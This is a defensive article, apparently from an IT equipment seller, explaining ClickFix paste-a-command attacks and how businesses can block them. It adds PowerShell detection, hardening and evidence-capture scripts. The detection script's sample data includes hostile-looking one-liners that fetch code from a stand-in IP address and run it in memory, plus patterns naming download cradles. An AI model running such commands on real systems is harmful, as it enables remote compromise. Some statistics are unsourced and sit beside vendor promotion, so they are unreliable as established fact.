The “Fix Your Computer” Trick That’s Destroying Businesses Across America
ClickFix attacks are one of the fastest-growing cyber threats of 2026 — and most people have never even heard of them.
An accounting firm in Atlanta. A dental practice in Phoenix. A logistics company in Denver. Three completely different businesses. Three completely different industries. All hit by the same attack in the same month.
The pattern was identical every time. An employee saw a popup on a legitimate-looking website. It said their browser was broken, or a document couldn’t load, or a security verification was needed. It gave them a simple fix: copy this command, open your computer’s run window, paste it in, press Enter.
They did. And in under 60 seconds, attackers had remote access to their machines and a foothold from which to reach the rest of the business network.
That’s a ClickFix attack. No email to flag. No suspicious attachment to scan. No installer the user knowingly downloads. Just a convincing message, a person following instructions, and a compromised machine inside the business network.
ClickFix attacks jumped 500% between 2023 and 2025. They’re active right now, hitting businesses across the US, UK, Canada, and Australia. This guide explains exactly how they work and exactly how to stop them.
The Scale of ClickFix Attacks in 2026
ClickFix attacks didn’t exist as a named threat category three years ago. Now they’re one of the most documented social engineering techniques in the wild.
Security researchers first documented the technique in campaigns from late 2023 and early 2024, when fake browser-update and fake-error pages stopped offering a download and started offering a command to paste; the ClickFix name followed in 2024. By the end of that year, threat intelligence firms were tracking hundreds of distinct ClickFix campaigns running simultaneously across multiple countries. By 2025, the technique had been adopted by nation-state threat actors, ransomware affiliate groups, and commodity cybercriminals alike.
The 500% growth figure isn’t hype. It reflects the fundamental reason this attack works so well: it sidesteps file-centric controls by making the human, rather than an exploit, the delivery mechanism.
⚠️ ALERT: CISA and its partner agencies published guidance in 2024 on detecting and mitigating “living-off-the-land” techniques, in which attackers operate through tools already present on the system instead of dropping malware. ClickFix is social engineering built on exactly those tools: the command the victim pastes is executed by a trusted, signed Windows binary (PowerShell, mshta, rundll32), so at that moment there is no new file for signature-based antivirus to scan. Later stages frequently do write files, which is why process and script telemetry matters more than file scanning here. Read CISA’s living-off-the-land guidance
The industries most targeted by ClickFix attacks in 2025 were healthcare, legal services, financial services, and manufacturing — exactly the sectors where employees regularly encounter unfamiliar software prompts and IT helpdesk messages. Attackers pick environments where “your system needs an update” sounds completely normal.
The financial damage varies. Some ClickFix attacks lead directly to ransomware deployment. Others install infostealers that quietly harvest credentials over weeks. Others give attackers persistent remote access used for corporate espionage. The average total cost of a ClickFix-initiated breach: $1.2 million.
How ClickFix Attacks Actually Work: The Full Breakdown
Understanding ClickFix attacks at a technical level is the first step to recognizing and stopping them. Here’s the complete attack chain:
CLICKFIX ATTACK CHAIN — STEP BY STEP
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
STEP 1 │ LURE DELIVERY
│ Employee reaches a fake or compromised webpage
│ Popup appears — "Error," "Verification needed,"
│ "Your browser is outdated," "CAPTCHA required"
────────┼─────────────────────────────────────────────
STEP 2 │ SOCIAL ENGINEERING INSTRUCTION
│ Popup gives a "fix" — copy a command string
│ Instructions say: Press Win+R → Paste → Enter
│ OR: Open PowerShell → Paste → Run
│ Command looks like a repair or verification code
────────┼─────────────────────────────────────────────
STEP 3 │ USER EXECUTES THE COMMAND
│ User opens Windows Run dialog or PowerShell
│ Pastes the command from clipboard
│ Presses Enter — believing they're fixing a problem
────────┼─────────────────────────────────────────────
STEP 4 │ PAYLOAD DELIVERY (USUALLY NO VISIBLE DOWNLOAD)
│ Command calls out to attacker server
│ Fetches the next stage; first stage often runs in memory
│ Trusted signed binary runs it = file-scanning AV blind
────────┼─────────────────────────────────────────────
STEP 5 │ PERSISTENCE ESTABLISHED
│ Remote Access Trojan (RAT) or infostealer active
│ OR: Ransomware pre-deployment backdoor placed
│ Attacker now has full access — silently
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
TOTAL TIME FROM STEP 1 TO STEP 5: Under 60 seconds
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
The most important detail: the stage the victim launches runs through a trusted Windows binary (PowerShell, mshta, rundll32), often entirely in memory. File-scanning antivirus looks at files as they land on disk, and at that moment there is nothing new to scan. What does see the command is anything watching process behaviour and script content: process-creation logs that include the command line, PowerShell script block logging, and engines that receive script text through AMSI. Later stages frequently drop files (a stealer, a RAT, a loader DLL), but by then the attacker is already running.
This is what makes ClickFix attacks so effective and so dangerous. The attacker weaponizes the human being and Windows’ own tools simultaneously. Your security stack is looking for something that technically never appeared.
🔴 WARNING: Microsoft’s threat intelligence team has documented ClickFix variants that use legitimate Windows binaries, mshta.exe, rundll32.exe, and PowerShell, to run malicious payloads in memory. Because these are signed system tools, allow-listing policies that permit everything signed by Microsoft, and endpoint protection that only scans files, typically let them run. Read Microsoft’s threat intelligence research
Where ClickFix Attacks Come From: Delivery Methods
ClickFix attacks reach victims through multiple channels. Knowing where they come from helps you understand what to watch for.
Compromised Legitimate Websites
The most common delivery method. Attackers compromise a real, trusted website — a news portal, a legal resource, an industry forum — and inject JavaScript that displays the ClickFix popup. The URL looks real. The site content looks real. Only the popup is malicious.
Security researchers have found ClickFix attack code injected into over 6,000 legitimate websites in a single campaign. Employees visiting these sites for entirely legitimate reasons encounter the attack.
Malvertising Networks
Attackers purchase ad space on legitimate ad networks and serve ClickFix popups through display ads. The user visits a completely normal website, an ad loads, and the ClickFix popup appears. The website owner has no idea it’s happening.
Phishing Emails With Weaponized Links
A phishing email directs the user to a ClickFix-enabled page. The email doesn’t contain the attack — it just drives traffic to the page that does. This hybrid approach makes the phishing email itself look clean — no malicious attachments, no flagged links — because the payload only activates on the landing page.
Fake Software Update Pages
Attackers build convincing fake pages mimicking Chrome updates, Microsoft Teams notifications, Adobe Reader update prompts, and Zoom verification screens. These appear as popups or redirect pages when employees try to access popular SaaS tools.
| Delivery Method | % of ClickFix Attacks | Detection Difficulty |
|---|---|---|
| Compromised legitimate sites | 38% | Very Hard |
| Malvertising | 27% | Very Hard |
| Phishing email → ClickFix page | 21% | Hard |
| Fake software update pages | 14% | Medium |
⚠️ ALERT: The Verizon 2024 Data Breach Investigations Report found that the human element (phishing, pretexting, misuse, and simple error) was involved in roughly two-thirds of the breaches it analyzed. ClickFix sits squarely in that category: it needs no vulnerability, only a person willing to follow instructions. Read the full Verizon DBIR
How ClickFix Attacks Evade Your Security Tools
This is the part that makes ClickFix attacks particularly alarming for security professionals. They’re specifically engineered to slip past the tools most organizations rely on.
Why Antivirus Misses It Signature-based antivirus scans files. The ClickFix command runs inside a signed Windows binary and often pulls its next stage straight into memory, so there is no new file to scan when it executes. What can see it is the Antimalware Scan Interface (AMSI), which hands PowerShell script text to the installed engine before it runs, and the behavioural analysis in modern endpoint suites. Both are only useful if they are enabled, current, and not switched off by the payload’s first action; tampering with AMSI is a common opening move.
Why Email Security Misses It When ClickFix attacks arrive via phishing email, the email itself contains no malicious attachment or flagged URL. The malicious payload is on the landing page, not in the email. Email sandboxing won’t catch what isn’t there.
Why Web Filtering Often Misses It ClickFix attacks often live on legitimate, previously trusted domains. Web filtering tools that rely on domain reputation lists may not flag a compromised news website or legal resource that was clean last week.
Why Application Control Struggles The commands used in ClickFix attacks invoke legitimate Windows binaries: PowerShell, mshta, rundll32. Most allow-list policies permit them because they are signed by Microsoft and used by real IT tooling. Blocking them outright for every user would break legitimate administration; denying mshta.exe to standard users and confining PowerShell to IT accounts is usually the workable middle ground.
The most reliable technical defense at the endpoint is behaviour-based EDR that looks at what PowerShell is doing, not merely that it is running. powershell.exe or mshta.exe started from explorer.exe, with a hidden window, a download cradle, and an in-memory execution in the command line, is the signature of this attack, and an EDR (or a SIEM rule over process-creation and script block logs) that correlates those will flag it. Standard antivirus won’t.
If your business network lacks proper web filtering and DNS-level protection, ClickFix attacks have a clear path to your endpoints. Our article on router settings you must change covers the basic network configurations that cut off many of these attack paths before they reach your team.
Real ClickFix Attack Examples From 2024–2025
These aren’t hypothetical scenarios. These are documented ClickFix attack campaigns that security researchers tracked in real time.
The Fake Google Meet Verification
In late 2024, attackers built convincing fake Google Meet pages. When users tried to join a meeting, a popup appeared saying their microphone or camera had a “connection issue” requiring a quick fix. The “fix” was a PowerShell command. Thousands of users executed it before the campaign was identified.
The payload: a remote access trojan that gave attackers persistent access. Several corporate victims didn’t discover the breach for weeks.
The Fake CAPTCHA ClickFix Campaign
One of the largest ClickFix attack campaigns of 2024 used fake CAPTCHA verification pages. Instead of clicking “I’m not a robot” on a checkbox, users were told to prove they were human by pressing Win+R and running a command. The psychology was clever — CAPTCHA verification feels like a normal internet experience.
This campaign targeted US financial services firms specifically. Estimated victims: tens of thousands across a six-week window.
The Compromised Law Firm Resource Portal
Attackers compromised a legal research portal used by thousands of small law firms across the US. They injected ClickFix attack code that appeared as a “document viewer plugin” installation prompt. Attorneys executing the “plugin install” handed attackers full access to systems containing sensitive client data and case files.
The SocGholish Connection
ClickFix attacks frequently connect to SocGholish — the fake browser update malware delivered through compromised websites. In many documented campaigns, SocGholish delivers the initial ClickFix popup, which then executes a payload that installs a second-stage trojan. The two techniques complement each other perfectly.
The Hardware and Software That Blocks ClickFix Attacks
No single tool stops ClickFix attacks completely — but the right combination dramatically reduces your exposure.
DNS Filtering — First Line of Defense
When a ClickFix command calls out to the attacker’s server for its next stage, it first resolves that server’s name through DNS. DNS filtering refuses to resolve names on its blocklist, so a payload hosted on a known-bad domain never arrives even though the employee ran the command. The caveat: it only helps against domains already rated malicious. Campaigns that use freshly registered domains, raw IP addresses, or legitimate hosting (paste sites, CDN edges, code-hosting platforms) walk straight past it, which is why it is a layer and not a fix.
Cloudflare Gateway (free tier available) provides solid DNS filtering. Business-grade next-generation firewalls include DNS filtering with live threat intelligence feeds that identify attacker infrastructure in near real-time.
Next-Generation Firewall With Threat Intelligence
A next-gen firewall with deep packet inspection and TLS inspection sees the outbound HTTPS request the pasted command makes from the endpoint. When the destination matches known attacker infrastructure in a threat intelligence feed, or the traffic matches a known command-and-control pattern, the firewall blocks it.
We stock enterprise-grade Fortinet FortiGate firewalls that include FortiGuard threat intelligence — a live-updated feed covering known ClickFix attack infrastructure, malicious domains, and command-and-control servers. FortiGate’s SSL inspection also catches encrypted malicious traffic that basic firewalls miss entirely.
Behavior-Based EDR
This is your last line of technical defense when a ClickFix attack gets through everything else. EDR solutions that monitor PowerShell behavior — specifically watching for scripts that make outbound network connections, download content, and execute it — will catch ClickFix attacks mid-execution.
Microsoft Defender for Business (included in M365 Business Premium) has PowerShell behavioral monitoring. CrowdStrike Falcon and SentinelOne are enterprise-grade options. Any of these beats standard antivirus for ClickFix defense.
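The EDR behaviour this section and the evasion section describe (a user-launched PowerShell or mshta making an outbound call and executing what it fetched) is concrete enough to write down as a rule. The following is an added example, not code from the article or from any EDR vendor: a PowerShell function that scores a process-creation record the way a behaviour rule would, run over constructed sample records with made-up paths, hostnames and addresses. It assumes records shaped like Sysmon Event ID 1 or Security Event 4688 with command-line auditing enabled, carrying ParentImage, Image and CommandLine fields.

```powershell
# Added example, not code from the article or from any vendor: a behaviour rule for the
# ClickFix execution chain, applied to constructed process-creation records. On a live host
# you would feed it Sysmon Event ID 1 or Security Event 4688 records instead of $SampleEvents.

# Constructed sample telemetry (assumption: made-up paths, hosts and addresses, not real events).
$EncodedStage = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('iex (irm http://198.51.100.7/p)'))
$SampleEvents = @(
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell -w hidden -ep bypass -c "iwr http://198.51.100.7/v.txt | iex"' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'; Image = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'mshta https://verify.example.invalid/check.hta' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = "powershell -nop -enc $EncodedStage" },
    # Benign: the same binary launched by a management agent with a local script, not by the user's shell.
    [pscustomobject]@{ ParentImage = 'C:\Windows\CCM\CcmExec.exe'; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell -ExecutionPolicy Bypass -File C:\Scripts\Inventory.ps1' }
)

function Test-ClickFixChain {
    param([Parameter(Mandatory)][psobject]$Record)

    # Launchers a person reaches from Win+R, a terminal, or the Explorer address bar.
    $UserLaunchers = 'explorer.exe', 'cmd.exe', 'WindowsTerminal.exe'
    # Living-off-the-land binaries the lures ask the victim to run.
    $Lolbins = 'powershell.exe', 'pwsh.exe', 'mshta.exe', 'rundll32.exe', 'cmd.exe', 'curl.exe', 'certutil.exe'

    $parent = [IO.Path]::GetFileName([string]$Record.ParentImage)
    $child  = [IO.Path]::GetFileName([string]$Record.Image)
    if ($UserLaunchers -notcontains $parent -or $Lolbins -notcontains $child) { return $null }

    $cmd = [string]$Record.CommandLine
    # -EncodedCommand carries Base64 of UTF-16LE text; decode it so the rules see the real command.
    if ($cmd -match '(?i)-e(nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})') {
        try { $cmd += ' ' + [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) } catch {}
    }

    $Indicators = [ordered]@{
        'download cradle' = '(?i)\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|curl|wget|certutil)\b'
        'remote URL'      = '(?i)\bhttps?://'
        'in-memory exec'  = '(?i)\b(iex|Invoke-Expression)\b'
        'hidden window'   = '(?i)-w(indowstyle)?\s+h(idden)?\b'
        'policy bypass'   = '(?i)-e(xecutionpolicy|p)\s+bypass\b'
        'remote HTA'      = '(?i)^mshta(\.exe)?\s+.*https?://'
    }
    $hits = @($Indicators.GetEnumerator() | Where-Object { $cmd -match $_.Value } | ForEach-Object Key)
    if ($hits.Count -eq 0) { return $null }

    # Two or more behaviours together are the ClickFix signature; one alone is worth a look, not a page.
    $severity = if ($hits.Count -ge 2) { 'High' } else { 'Medium' }
    [pscustomobject]@{
        Severity    = $severity
        Parent      = $parent
        Child       = $child
        Indicators  = $hits -join ', '
        CommandLine = [string]$Record.CommandLine
    }
}

$SampleEvents | ForEach-Object { Test-ClickFixChain -Record $_ } | Format-Table -AutoSize -Wrap
```

The first three records trip two or more rules (the encoded one only after its UTF-16LE Base64 payload is decoded); the fourth, the same binary launched by a management agent with a local script, is ignored because the parent is not a user shell. On a live host, replace $SampleEvents with Get-WinEvent output from the Sysmon or Security log, mapping the event’s fields onto those three property names; without command-line auditing, 4688’s command line is empty and the rule is blind.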
Application Control for PowerShell
Set a PowerShell execution policy (RemoteSigned or AllSigned) as basic hygiene, but understand what it does and does not do: it governs script files, not commands typed or pasted at a prompt, and the lure’s one-liner typically passes -ExecutionPolicy Bypass anyway. Microsoft does not treat it as a security boundary. The controls that actually bite are application control (AppLocker or WDAC) that denies powershell.exe and mshta.exe to accounts with no business running them, and Constrained Language Mode, which those same policies enforce and which blocks the .NET reflection and web-client tricks most ClickFix payloads rely on.
Here’s how the protection layers stack up against ClickFix attacks specifically:
| Defense Layer | Blocks ClickFix? | How |
|---|---|---|
| Traditional Antivirus | ❌ No | No new file to scan at execution; only AMSI and behaviour engines see it |
| Email Security Gateway | ⚠️ Partial | Only catches email-delivered variants |
| Web Content Filtering | ⚠️ Partial | Misses compromised trusted domains |
| DNS Filtering | ⚠️ Partial | Blocks payload download from known-bad domains; misses fresh domains and legitimate hosting |
| Next-Gen Firewall + TI | ⚠️ Partial | Blocks C2 traffic to known attacker infrastructure |
| PowerShell Execution Policy | ❌ No | Governs script files only; pasted one-liners and -ep bypass ignore it |
| Application Control (AppLocker/WDAC) | ✅ Yes | Denies mshta and PowerShell to standard users; enforces Constrained Language Mode |
| Behavior-Based EDR | ✅ Yes | Catches the process chain and script behaviour in-execution |
| Employee Training | ✅ Yes | Stops the paste before it happens |
For network-level protection that enforces these controls across every device on your network — including BYOD and guest devices — browse our WatchGuard firewall collection. WatchGuard’s DNSWatch service specifically intercepts malicious DNS queries that ClickFix attacks depend on.
Employee Training: The Only Real Defense Against ClickFix
Here’s the uncomfortable truth: technology alone cannot fully stop ClickFix attacks. The attack specifically targets human psychology. The only complete defense is a human who recognizes the attack for what it is and doesn’t execute the command.
What Employees Need to Know
Every person in your organization needs to understand one core rule: no legitimate software, website, or IT system will ever ask you to open your Run dialog or PowerShell and paste in a command.
That’s it. That single fact defeats ClickFix attacks. If an employee knows that instruction is always an attack — no matter how convincing the surrounding context — they won’t execute it.
Specific Scenarios to Train On
Train employees to recognize these exact ClickFix attack lures:
- “Your browser needs to be verified — press Win+R and run this command”
- “To view this document, complete this security check” with a command to copy
- “Your microphone/camera isn’t working — run this fix”
- “CAPTCHA verification failed — please verify manually using these steps”
- “Microsoft Teams requires an update — run this installer command”
- “Your IT department requires you to run this compliance script”
Every single one of these is a ClickFix attack lure. None of them are legitimate. Real IT departments don’t deliver fixes via clipboard commands on random websites.
Run Simulated ClickFix Scenarios
Most phishing simulation platforms now include ClickFix attack simulations. Send your team a simulated ClickFix lure and track who follows through with the command. Coach those who do — without punishment — on exactly why the prompt was suspicious.
Employees who nearly fell for a simulation remember the lesson far longer than employees who just watched a training video.
The risk is compounded when employees work remotely or use public WiFi, where they’re more likely to encounter compromised websites and less likely to have IT support nearby. Our guide on the hidden danger of public WiFi in 2026 covers the additional exposure remote work creates.
How to Protect Yourself: Step-by-Step
Here’s the concrete action plan to defend against ClickFix attacks starting today.
- Brief your team today — Send an all-staff message explaining ClickFix attacks. One paragraph. “You may see popups asking you to run commands. This is always an attack. Never do it. Report it immediately.” Do this before anything else.
- Enable DNS filtering — Cloudflare Gateway takes about 30 minutes to configure and blocks resolution of known-malicious domains, which is where many ClickFix payloads are hosted. Free for basic use. It will not see a payload on a fresh domain or a raw IP address, so do not stop here.
- Deploy behavior-based EDR — If you’re on Microsoft 365, enable Defender for Business. If not, deploy Malwarebytes for Teams or a comparable solution. Make sure script block logging, AMSI integration, and the attack surface reduction rule for obfuscated scripts are turned on, not just installed.
- Configure PowerShell execution policy, then the controls that matter — Set the policy to “RemoteSigned” or “AllSigned” via Group Policy as hygiene, knowing it does not stop a pasted command or a one-liner with -ExecutionPolicy Bypass. The effective restriction is AppLocker or WDAC denying powershell.exe and mshta.exe to users who do not need them, which also enforces Constrained Language Mode.
- Restrict the Windows Run dialog — Where users don’t need it, remove it via Group Policy (User Configuration > Administrative Templates > Start Menu and Taskbar > “Remove Run menu from Start Menu”, which also disables Win+R). Expect lures to adapt: newer variants tell the victim to paste into the File Explorer address bar or a terminal instead, so treat this as removing one door, not all of them.
- Enable web content filtering on your firewall — Activate URL filtering and SSL inspection on your next-gen firewall. Enable real-time threat intelligence feeds to catch newly compromised domains.
- Run a ClickFix simulation — Use your phishing simulation platform to test your team’s response to a realistic ClickFix lure. Identify who needs additional coaching.
- Establish a “suspicious popup” reporting channel — Create a simple way for employees to report popups they’re unsure about. A dedicated email address or Slack channel works. Remove the ambiguity so employees report rather than ignore.
- Review network segmentation — If a ClickFix attack does succeed on one endpoint, proper VLAN segmentation limits what attackers can reach from that machine. See our VLAN setup guide for 2026 for implementation details.
- Review your Incident Response Plan — Add ClickFix attacks as a specific scenario. What’s the procedure if an employee reports executing a suspicious command? Fast response in the first 30 minutes can prevent full compromise.
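Steps 3 through 5 above, and the Application Control section earlier, come down to a handful of local policy values and Defender settings. What follows is an added example, not code from the article or from Microsoft: a PowerShell script that applies those settings as local policy and then reads them back as a pass/fail report. It assumes Windows 10 or 11 with Microsoft Defender as the active engine and is meant to be run once as an administrator on a test machine; in a domain the same values belong in a GPO or Intune profile rather than in a script touching each host’s registry.

```powershell
#Requires -RunAsAdministrator
# Added example, not code from the article: the endpoint settings that actually bear on a
# pasted one-liner, applied as local policy and then read back. Assumptions: Windows 10/11
# with Microsoft Defender as the active engine; in a domain, set the same values through
# GPO or Intune rather than writing the registry on each host. PowerShell execution policy
# is deliberately absent: it governs script files, and the lure's command is pasted
# interactively or passes -ExecutionPolicy Bypass.

$Settings = @(
    # Remove the Run dialog (Win+R) for interactive users. Lures then fall back to the
    # Explorer address bar or a terminal, so this raises the bar rather than closing it.
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
       Name = 'NoRun'; Value = 1 },
    # Log every script block PowerShell compiles (Event 4104), pasted commands included.
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
       Name = 'EnableScriptBlockLogging'; Value = 1 },
    # Put the full command line into Security Event 4688 so the parent/child chain is visible.
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
       Name = 'ProcessCreationIncludeCmdLine_Enabled'; Value = 1 }
)
foreach ($s in $Settings) {
    if (-not (Test-Path $s.Path)) { New-Item -Path $s.Path -Force | Out-Null }
    New-ItemProperty -Path $s.Path -Name $s.Name -Value $s.Value -PropertyType DWord -Force | Out-Null
}
# 4688 is only written when the Process Creation subcategory is audited.
auditpol /set /subcategory:"Process Creation" /success:enable | Out-Null

# Defender attack surface reduction rules that fire on the stage the lure launches.
$AsrRules = @{
    '5beb7efe-fd9a-4556-801d-275e5ffc04cc' = 'Block execution of potentially obfuscated scripts'
    'd3e037e1-3eb8-44c8-a917-57927947596d' = 'Block JavaScript or VBScript from launching downloaded executable content'
}
foreach ($id in $AsrRules.Keys) {
    Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions Enabled
}
# Network protection blocks outbound connections to domains Defender rates malicious,
# which still catches the download cradle after the user has pressed Enter.
Set-MpPreference -EnableNetworkProtection Enabled

function Test-ClickFixHardening {
    # Read every setting back so the result can go straight into a compliance report.
    $report = @(foreach ($s in $Settings) {
        $actual = (Get-ItemProperty -Path $s.Path -Name $s.Name -ErrorAction SilentlyContinue).($s.Name)
        [pscustomobject]@{ Control = $s.Name; Expected = $s.Value; Actual = $actual; Ok = ($actual -eq $s.Value) }
    })
    $pref = Get-MpPreference
    $ids  = @(@($pref.AttackSurfaceReductionRules_Ids) | Where-Object { $_ } | ForEach-Object { $_.ToLower() })
    foreach ($id in $AsrRules.Keys) {
        $i = [array]::IndexOf($ids, $id)
        # Action 1 = Block, 2 = Audit, 6 = Warn, 0 = Off; -1 here means the rule is not configured.
        $state = if ($i -ge 0) { [int]$pref.AttackSurfaceReductionRules_Actions[$i] } else { -1 }
        $report += [pscustomobject]@{ Control = $AsrRules[$id]; Expected = 1; Actual = $state; Ok = ($state -eq 1) }
    }
    $np = [int]$pref.EnableNetworkProtection   # 1 = Enabled, 2 = Audit, 0 = Disabled
    $report += [pscustomobject]@{ Control = 'EnableNetworkProtection'; Expected = 1; Actual = $np; Ok = ($np -eq 1) }
    $report
}
Test-ClickFixHardening | Format-Table -AutoSize
```

Two things to notice. Execution policy is not set here because it does not stop a pasted command; the script-block-logging and command-line-auditing values are what give an EDR or SIEM something to match on. And the ASR rule IDs are Microsoft’s published GUIDs for the two rules named in the comments; if your tenant manages ASR centrally, Add-MpPreference will be overridden at the next policy refresh, which is the right outcome.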
Quick Reference Checklist
Use this to verify your defenses against ClickFix attacks are in place.
CLICKFIX ATTACK DEFENSE CHECKLIST
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
IMMEDIATE ACTIONS (DO THIS WEEK)
[ ] All-staff alert sent explaining ClickFix attacks
[ ] DNS filtering enabled (Cloudflare Gateway or firewall)
[ ] PowerShell execution policy set to RemoteSigned/AllSigned (hygiene only; AppLocker/WDAC is the real restriction)
[ ] Behavior-based EDR deployed on all endpoints
[ ] PowerShell behavioral monitoring enabled in EDR
NETWORK CONTROLS
[ ] Next-gen firewall with active threat intelligence
[ ] SSL/TLS inspection enabled for HTTPS traffic
[ ] Web content filtering active with live threat feeds
[ ] DNS filtering logs reviewed weekly for blocked queries
[ ] Outbound connection monitoring active
ENDPOINT HARDENING
[ ] Windows Run dialog restricted for standard users (GPO)
[ ] PowerShell disabled or restricted for non-IT users
[ ] Local admin rights removed from standard accounts
[ ] Application whitelisting reviewed — mshta.exe monitored
[ ] Clipboard monitoring enabled in EDR where possible
EMPLOYEE AWARENESS
[ ] ClickFix attack training completed by all staff
[ ] Phishing simulation including ClickFix scenario run
[ ] Suspicious popup reporting channel established
[ ] "Never run commands from a website" rule communicated
[ ] Remote workers briefed on elevated risk
DETECTION & RESPONSE
[ ] EDR alerts for suspicious PowerShell behavior active
[ ] Incident response procedure for ClickFix documented
[ ] First 30-minute response steps defined and rehearsed
[ ] Forensic preservation steps known by IT staff
[ ] Cyber insurance carrier contact info accessible
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Frequently Asked Questions
Q: What exactly is a ClickFix attack?
A: A ClickFix attack is a social engineering technique where attackers display a fake error or verification popup on a website, legitimate or compromised, that instructs the user to copy a command into their Windows Run dialog or PowerShell and execute it. The command reaches out to attacker infrastructure and pulls down a malicious payload, typically running the first stage in memory inside a trusted Windows binary, so file-scanning antivirus has nothing to inspect at the moment of execution. The name comes from the “click here to fix” framing attackers use.
Q: How is a ClickFix attack different from regular phishing?
A: Traditional phishing tricks you into clicking a link or opening an attachment that delivers malware. ClickFix attacks trick you into running a command yourself using your own computer’s built-in tools. This distinction matters because: (1) the first stage runs inside a trusted system binary rather than arriving as a malicious attachment or download, so file scanners have nothing to catch; (2) the user’s own action executes the attack, bypassing most automated defenses; and (3) the attack works even on computers with fully updated software because it exploits human behavior, not a software vulnerability.
Q: Can ClickFix attacks affect Mac or Linux users?
A: The most common ClickFix attack variants target Windows systems specifically, using Win+R (Run dialog) and PowerShell. However, researchers have documented Mac variants that use Terminal commands with similar social engineering. Any operating system with a command-line interface can theoretically be targeted. Windows remains the primary target due to its enterprise market dominance.
Q: If an employee ran a ClickFix command, what should they do immediately?
A: Before anything else, have them leave the popup and the Run window exactly as they are and photograph or write down the command they pasted; it is usually still on the clipboard as well. Then disconnect the machine from the network immediately: pull the ethernet cable or disable WiFi. Do not turn the machine off (that destroys what is in memory, including the second stage if it is running). Notify IT or your security contact right away. Do not attempt to “undo” the command yourself. Time matters: the faster the machine is isolated, the less lateral movement attackers can achieve. Your IT team or incident response firm will need to forensically analyze the machine to understand the full scope of what was executed.
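The steps in that answer stop at “isolate and call IT”. What the IT contact does in the first half hour is also worth writing down. The following is an added example, not the article’s or any IR firm’s procedure: a PowerShell evidence-capture script for the affected machine that gathers the artifacts a ClickFix execution leaves behind (the clipboard, the Run dialog history, PowerShell script block and process-creation events, live processes and connections, and the usual persistence spots) into a timestamped folder with a hash manifest. It assumes it is run as an administrator inside the affected user’s session, after the cable is pulled and before any reboot; the output path and the 24-hour lookback are choices, not requirements.

```powershell
#Requires -RunAsAdministrator
# Added example, not code from the article: first-30-minutes evidence capture on a machine
# where someone reports pasting a "fix" command. Assumptions: run in the affected user's
# session, as an administrator, after the network cable is pulled and before any reboot
# (several artifacts live in memory or in the current logon session). It collects and
# hashes; it does not clean, kill or "undo" anything.
param([string]$OutDir = "C:\IR\clickfix-$(Get-Date -Format 'yyyyMMdd-HHmmss')")
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

function Get-ClickFixArtifacts {
    $since = (Get-Date).AddHours(-24)
    [ordered]@{
        # The pasted text is usually still on the clipboard; grab it before anything overwrites it.
        Clipboard      = Get-Clipboard -Raw
        # Win+R keeps a most-recently-used list of everything typed into it.
        RunMRU         = Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -ErrorAction SilentlyContinue
        # Script block logging (4104) holds the command text even when the console was hidden;
        # PowerShell 5+ logs blocks it considers suspicious at Warning level even with logging off.
        ScriptBlocks   = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $since } -ErrorAction SilentlyContinue |
                         Select-Object TimeCreated, @{ n = 'ScriptBlockText'; e = { $_.Properties[2].Value } }
        # Process creation (4688) with command lines, if command-line auditing was enabled.
        ProcessCreate  = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } -ErrorAction SilentlyContinue |
                         Where-Object { $_.Message -match '(?i)powershell|pwsh|mshta|rundll32|cmd\.exe|curl' } |
                         Select-Object TimeCreated, Message
        # Live state: the second stage is often still running and still connected.
        Processes      = Get-CimInstance Win32_Process | Select-Object ProcessId, ParentProcessId, Name, CommandLine
        Connections    = Get-NetTCPConnection -State Established | Select-Object LocalPort, RemoteAddress, RemotePort, OwningProcess
        # Persistence spots a ClickFix second stage commonly writes to.
        RunKeys        = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run', 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' |
                         ForEach-Object { Get-ItemProperty $_ -ErrorAction SilentlyContinue }
        NewTasks       = Get-ScheduledTask | Where-Object { ($_.Date -as [datetime]) -gt $since } | Select-Object TaskName, TaskPath, Date
        StartupFolder  = Get-ChildItem "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" -ErrorAction SilentlyContinue
        # Only populated if the victim pasted into an interactive PowerShell console.
        ConsoleHistory = Get-Content "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Tail 50 -ErrorAction SilentlyContinue
    }
}

$artifacts = Get-ClickFixArtifacts
foreach ($name in $artifacts.Keys) {
    $artifacts[$name] | Format-List | Out-File -FilePath (Join-Path $OutDir "$name.txt") -Width 4096
}
# Hash the capture so its integrity can be shown later; the manifest lives beside, not inside, the folder.
Get-ChildItem $OutDir -File | Get-FileHash -Algorithm SHA256 |
    Export-Csv -Path "$OutDir.sha256.csv" -NoTypeInformation
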